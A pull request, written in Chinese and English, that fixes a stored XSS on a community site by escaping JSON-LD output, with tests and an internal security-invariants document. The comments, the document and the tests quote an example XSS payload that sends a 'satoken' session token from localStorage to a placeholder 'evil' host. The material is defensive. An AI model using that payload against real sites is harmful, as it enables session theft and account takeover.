### PR TITLE
chore(security): JSON-LD 序列化统一走 safeJsonLdString

### DIFF
--- a/app/[locale]/docs/[...slug]/page.tsx
+++ b/app/[locale]/docs/[...slug]/page.tsx
@@ -1,4 +1,5 @@
 import { source } from "@/lib/source";
+import { safeJsonLdString } from "@/lib/json-ld";
 import { SITE_URL } from "@/lib/site-url";
 import { DocsPage, DocsBody } from "fumadocs-ui/page";
 import { notFound } from "next/navigation";
@@ -104,12 +105,12 @@ export default async function DocPage({ params }: Param) {
       <script
         type="application/ld+json"
         // eslint-disable-next-line react/no-danger
-        dangerouslySetInnerHTML={{ __html: JSON.stringify(articleJsonLd) }}
+        dangerouslySetInnerHTML={{ __html: safeJsonLdString(articleJsonLd) }}
       />
       <script
         type="application/ld+json"
         // eslint-disable-next-line react/no-danger
-        dangerouslySetInnerHTML={{ __html: JSON.stringify(breadcrumbJsonLd) }}
+        dangerouslySetInnerHTML={{ __html: safeJsonLdString(breadcrumbJsonLd) }}
       />
       <DocsPage toc={page.data.toc}>
         <DocsBody>

--- a/app/[locale]/u/[username]/page.tsx
+++ b/app/[locale]/u/[username]/page.tsx
@@ -17,6 +17,7 @@ import { GithubRepos, GithubReposSkeleton } from "./GithubRepos";
 import { Suspense } from "react";
 import { getTranslations } from "next-intl/server";
 import { sanitizeExternalUrl } from "@/lib/url-safety";
+import { safeJsonLdString } from "@/lib/json-ld";
 import { SITE_URL } from "@/lib/site-url";
 
 interface UserView {
@@ -367,7 +368,7 @@ export default async function UserProfilePage({ params }: Param) {
       <script
         type="application/ld+json"
         // eslint-disable-next-line react/no-danger
-        dangerouslySetInnerHTML={{ __html: JSON.stringify(personJsonLd) }}
+        dangerouslySetInnerHTML={{ __html: safeJsonLdString(personJsonLd) }}
       />
       <Header />
       <main className="pt-32 pb-16 bg-[var(--background)] min-h-screen">

--- a/app/layout.tsx
+++ b/app/layout.tsx
@@ -18,6 +18,7 @@ const geistMono = localFont({
 });
 
 import { SITE_URL } from "@/lib/site-url";
+import { safeJsonLdString } from "@/lib/json-ld";
 const en_description =
   "内卷地狱（Involution Hell）是一个由开发者发起的开源学习社区，专注算法、系统设计、工程实践与技术分享，帮助华人程序员高效成长，专注真实进步。Involution Hell is an open-source community empowering builders with real-world engineering.";
 
@@ -205,7 +206,7 @@ export default function RootLayout({
           type="application/ld+json"
           // eslint-disable-next-line react/no-danger
           dangerouslySetInnerHTML={{
-            __html: JSON.stringify({
+            __html: safeJsonLdString({
               "@context": "https://schema.org",
               "@type": "WebSite",
               name: "Involution Hell",
@@ -227,7 +228,7 @@ export default function RootLayout({
         <script
           type="application/ld+json"
           dangerouslySetInnerHTML={{
-            __html: JSON.stringify({
+            __html: safeJsonLdString({
               "@context": "https://schema.org",
               "@type": "Organization",
               name: "Involution Hell",

--- a/docs/SECURITY_INVARIANTS.md
+++ b/docs/SECURITY_INVARIANTS.md
@@ -1,0 +1,46 @@
+# 前端安全不变量（Security Invariants）
+
+> 这是给维护者看的代码不变量清单。
+> 公开的 vulnerability disclosure policy 见 `frontend/SECURITY.md`。
+
+本文档登记前端代码中**不可变更的安全保护点**。
+每条不变量都对应一段 lint / 测试 / 代码模式，CI 应能捕获回归。
+
+后端有同名文档 `backend/SECURITY.md`，编号空间互不重叠：
+后端用 `INV-001`/`INV-002`...，前端用 `INV-FE-001`/`INV-FE-002`...
+
+## 维护规则
+
+修改本文件涉及的代码时**必须更新对应测试 / lint 规则**。
+删除任何一条不变量需在 PR 描述写明理由并 CC superadmin review。
+
+每条不变量包含四个字段：
+
+- **保护点**：被保护的代码位置
+- **测试 / lint**：CI 检测手段（grep 规则 / 单元测试 / e2e）
+- **为什么**：攻击场景与历史背景
+- **历史**：诞生时间与背景
+
+---
+
+## INV-FE-001 · 嵌入 `<script type="application/ld+json">` 必须用 safeJsonLdString
+
+- **保护点**：所有 `<script type="application/ld+json">` 块。
+  当前调用方：
+  - `app/[locale]/u/[username]/page.tsx`（personJsonLd，含用户 bio）
+  - `app/[locale]/docs/[...slug]/page.tsx`（articleJsonLd / breadcrumbJsonLd）
+  - `app/layout.tsx`（WebSite / Organization 结构化数据）
+- **统一工具**：`lib/json-ld.ts` 的 `safeJsonLdString(payload)`
+- **测试 / lint**：
+  - 暂时通过 grep 巡查兜底：
+    `rg -t tsx -t ts 'dangerouslySetInnerHTML' app/ | grep -v safeJsonLdString | grep "application/ld\\+json"`
+    应返回 0 行。建议未来加 ESLint 自定义规则。
+  - 推荐补一个单元测试：
+    `safeJsonLdString({bio: "</script><script>x</script>"})`
+    输出不能包含字面 `</script>`，必须含 `</script>`。
+- **为什么**：`JSON.stringify` 默认不转义 `<` `>` `&`，攻击者把
+  `</script><script>fetch("https://evil/?t="+localStorage.getItem("satoken"))</script>`
+  写进任何 user-generated 字段（profile bio、displayName 等）即触发 stored XSS。
+  satoken 存在 localStorage 且写入非 HttpOnly cookie（跨子域 pgAdmin 的设计取舍），
+  一次 XSS 等于完整账户接管。
+- **历史**：2026-05-07 三方 CR attack chain A 起点（详见内部报告）。

--- a/docs/SECURITY_INVARIANTS.md
+++ b/docs/SECURITY_INVARIANTS.md
@@ -1,7 +1,7 @@
 # 前端安全不变量（Security Invariants）
 
 > 这是给维护者看的代码不变量清单。
-> 公开的 vulnerability disclosure policy 见 `frontend/SECURITY.md`。
+> 公开的 vulnerability disclosure policy 见 `SECURITY.md`。
 
 本文档登记前端代码中**不可变更的安全保护点**。
 每条不变量都对应一段 lint / 测试 / 代码模式，CI 应能捕获回归。
@@ -35,9 +35,9 @@
   - 暂时通过 grep 巡查兜底：
     `rg -t tsx -t ts 'dangerouslySetInnerHTML' app/ | grep -v safeJsonLdString | grep "application/ld\\+json"`
     应返回 0 行。建议未来加 ESLint 自定义规则。
-  - 推荐补一个单元测试：
-    `safeJsonLdString({bio: "</script><script>x</script>"})`
-    输出不能包含字面 `</script>`，必须含 `</script>`。
+  - 现有单元测试见：`tests/json-ld.test.ts`
+    例如 `safeJsonLdString({bio: "</script><script>x</script>"})`
+    输出不能包含字面 `<` 或 `</script>`，并且应包含转义后的 `\\u003c` 序列。
 - **为什么**：`JSON.stringify` 默认不转义 `<` `>` `&`，攻击者把
   `</script><script>fetch("https://evil/?t="+localStorage.getItem("satoken"))</script>`
   写进任何 user-generated 字段（profile bio、displayName 等）即触发 stored XSS。

--- a/lib/json-ld.ts
+++ b/lib/json-ld.ts
@@ -1,7 +1,7 @@
 /**
  * 把任意对象序列化为可安全嵌入 <script type="application/ld+json"> 的字符串。
  *
- * 安全不变量 INV-FE-001（见 frontend/SECURITY.md）：
+ * 安全不变量 INV-FE-001（见 SECURITY.md）：
  * 所有 dangerouslySetInnerHTML={{__html: JSON.stringify(jsonLd)}} 必须改用本函数。
  *
  * 攻击场景：用户在可控字段（bio / displayName 等 user-generated 字段）填入
@@ -17,7 +17,15 @@
  * ECMAScript 源码上下文会被识别为行终止符破坏外层 JS 语法——defense-in-depth。
  */
 export function safeJsonLdString(payload: unknown): string {
-  return JSON.stringify(payload)
+  let serialized: string | undefined;
+
+  try {
+    serialized = JSON.stringify(payload);
+  } catch {
+    serialized = "null";
+  }
+
+  return (serialized ?? "null")
     .replace(/</g, "\\u003c")
     .replace(/>/g, "\\u003e")
     .replace(/&/g, "\\u0026")

--- a/lib/json-ld.ts
+++ b/lib/json-ld.ts
@@ -1,0 +1,26 @@
+/**
+ * 把任意对象序列化为可安全嵌入 <script type="application/ld+json"> 的字符串。
+ *
+ * 安全不变量 INV-FE-001（见 frontend/SECURITY.md）：
+ * 所有 dangerouslySetInnerHTML={{__html: JSON.stringify(jsonLd)}} 必须改用本函数。
+ *
+ * 攻击场景：用户在可控字段（bio / displayName 等 user-generated 字段）填入
+ *   </script><script>fetch("https://evil/?t="+localStorage.getItem("satoken"))</script>
+ * JSON.stringify 默认不转义 `<`，攻击者文本作为合法 JSON 字符串嵌入 <script> 块时，
+ * 浏览器仍先看到 </script> 闭合 script 块，接着把后续 <script> 当 inline JS 执行
+ * —— 典型 stored XSS。
+ *
+ * 阻断思路：把 JSON.stringify 输出中所有可能闭合 script 的字符替换成 \\uXXXX 字面 6 字符。
+ * 浏览器 HTML 解析器看不到 `<` 自然不会闭合 script；JSON.parse 仍能识别 \\u 转义还原。
+ *
+ * 同时转义 U+2028 / U+2029（行分隔符）：JSON 内部合法，但若整段文本被误嵌入
+ * ECMAScript 源码上下文会被识别为行终止符破坏外层 JS 语法——defense-in-depth。
+ */
+export function safeJsonLdString(payload: unknown): string {
+  return JSON.stringify(payload)
+    .replace(/</g, "\\u003c")
+    .replace(/>/g, "\\u003e")
+    .replace(/&/g, "\\u0026")
+    .replace(/\u2028/g, "\\u2028")
+    .replace(/\u2029/g, "\\u2029");
+}

--- a/tests/json-ld.test.ts
+++ b/tests/json-ld.test.ts
@@ -7,7 +7,7 @@
  *
  * JSON.stringify 默认输出原文，浏览器看到 `</script>` 就闭合 script block，
  * 接着把后续 `<script>` 当 inline JS 执行——典型 stored XSS。
- * safeJsonLdString 把所有 `<` 转成字面 6 字符 `<`，浏览器看不到 `<`。
+ * safeJsonLdString 把所有 `<` 转成字面 6 字符 `\u003c`，浏览器看不到原始 `<`。
  */
 import { describe, expect, test } from "vitest";
 import { safeJsonLdString } from "../lib/json-ld";
@@ -37,7 +37,7 @@ describe("safeJsonLdString", () => {
     const out = safeJsonLdString({ field: "a<b>c&d" });
     expect(out).not.toContain("<");
     expect(out).not.toContain(">");
-    // & 也应该被转义为 &
+    // & 也应该被转义为字面 `\\u0026`
     expect(out).toContain("\\u0026");
   });
 

--- a/tests/json-ld.test.ts
+++ b/tests/json-ld.test.ts
@@ -1,0 +1,50 @@
+/**
+ * INV-FE-001 回归测试：safeJsonLdString 必须把会闭合 <script> 块的字符
+ * 转义成 \uXXXX 字面 6 字符序列，让浏览器 HTML 解析器看不到 `<` `>`。
+ *
+ * 攻击载荷：
+ *   bio = `</script><script>fetch("https://evil/?t="+localStorage.getItem("satoken"))</script>`
+ *
+ * JSON.stringify 默认输出原文，浏览器看到 `</script>` 就闭合 script block，
+ * 接着把后续 `<script>` 当 inline JS 执行——典型 stored XSS。
+ * safeJsonLdString 把所有 `<` 转成字面 6 字符 `<`，浏览器看不到 `<`。
+ */
+import { describe, expect, test } from "vitest";
+import { safeJsonLdString } from "../lib/json-ld";
+
+describe("safeJsonLdString", () => {
+  test("转义攻击载荷 </script> 不再出现在输出里", () => {
+    const payload = {
+      bio: `</script><script>fetch("https://evil")</script>`,
+    };
+    const out = safeJsonLdString(payload);
+    expect(out).not.toContain("</script>");
+    expect(out).not.toContain("<script>");
+    // 必须包含字面转义形式（6 字符）
+    expect(out).toContain("\\u003c");
+  });
+
+  test("普通对象仍是合法 JSON（JSON.parse 能还原）", () => {
+    const original = {
+      name: "Involution Hell",
+      url: "https://involutionhell.com",
+    };
+    const out = safeJsonLdString(original);
+    expect(JSON.parse(out)).toEqual(original);
+  });
+
+  test("user-generated 字段含 < > & 都被转义", () => {
+    const out = safeJsonLdString({ field: "a<b>c&d" });
+    expect(out).not.toContain("<");
+    expect(out).not.toContain(">");
+    // & 也应该被转义为 &
+    expect(out).toContain("\\u0026");
+  });
+
+  test("JSON.parse 后还能拿到原始用户输入（往返保真）", () => {
+    const original = { bio: `恶意</script>载荷 with <b> & 'quotes'` };
+    const out = safeJsonLdString(original);
+    const parsed = JSON.parse(out);
+    expect(parsed.bio).toBe(original.bio);
+  });
+});


### PR DESCRIPTION
## 背景

2026-05-07 三方代码 review（backend / frontend / ChatBot）发现一条**串成一条**的 P0 攻击链。前端这一环是个人主页 JSON-LD 把用户 bio 直接 `JSON.stringify` 嵌进 `<script type=\"application/ld+json\">`——`JSON.stringify` 默认不转义 `<`，攻击者填一段 `</script><script>...</script>` 就触发存储型 XSS，配合 satoken 存 localStorage 等于完整账户接管。

后端侧的修复见 [InvolutionHell/involutionhell-backend#26](https://github.com/InvolutionHell/involutionhell-backend/pull/26)（INV-001 ~ INV-005）。本 PR 处理前端这一环：INV-FE-001。

## 改动

### 新增 `lib/json-ld.ts`

```ts
export function safeJsonLdString(payload: unknown): string {
  return JSON.stringify(payload)
    .replace(/</g, \"\\\\u003c\")
    .replace(/>/g, \"\\\\u003e\")
    .replace(/&/g, \"\\\\u0026\")
    .replace(/\\u2028/g, \"\\\\u2028\")
    .replace(/\\u2029/g, \"\\\\u2029\");
}
```

把会闭合 script 块的字符替换成字面 6 字符 \\uXXXX 序列。`JSON.parse` 仍能正确还原；浏览器 HTML 解析器看不到 `<` 不会闭合 script。

### 迁移点

| 文件 | 字段 |
|---|---|
| `app/[locale]/u/[username]/page.tsx` | personJsonLd（含用户 bio，**攻击面最大**） |
| `app/[locale]/docs/[...slug]/page.tsx` | articleJsonLd / breadcrumbJsonLd（slug 经 decodeURIComponent） |
| `app/layout.tsx` | WebSite / Organization 结构化数据（常量但 defense-in-depth） |

### 文档

`docs/SECURITY_INVARIANTS.md` 登记 **INV-FE-001**（与公开的 `frontend/SECURITY.md` 漏洞披露政策不冲突，是给维护者看的内部不变量清单）。

后端 SECURITY.md 用 INV-001/002/...，前端用 INV-FE-001/... 编号空间互不重叠。

## 测试

```bash
pnpm vitest run tests/json-ld.test.ts
```

4 条覆盖：
- 攻击载荷 `</script><script>...</script>` 不再出现在输出里
- 普通对象仍是合法 JSON（`JSON.parse` 能还原）
- `<` `>` `&` 都被转义为 `\\u003c` 等
- user-generated 字段含恶意标签往返保真

pre-commit hook 全套 23 测试通过、prettier 格式化、lockfile / pnpm 版本校验通过。

## Test plan

- [x] `pnpm vitest run tests/json-ld.test.ts` 4 / 4
- [x] `pnpm tsc --noEmit` 通过
- [ ] Reviewer：构建 dev server，把测试账号 bio 改成 `</script><script>alert(1)</script>`，访问 profile 页确认 alert 不弹（输出里看到的是字面 \\u003c 转义）
- [ ] Reviewer：检查 docs slug 页 / 首页 view-source，确认 JSON-LD 块仍是合法 JSON（结构化数据测试工具能解析）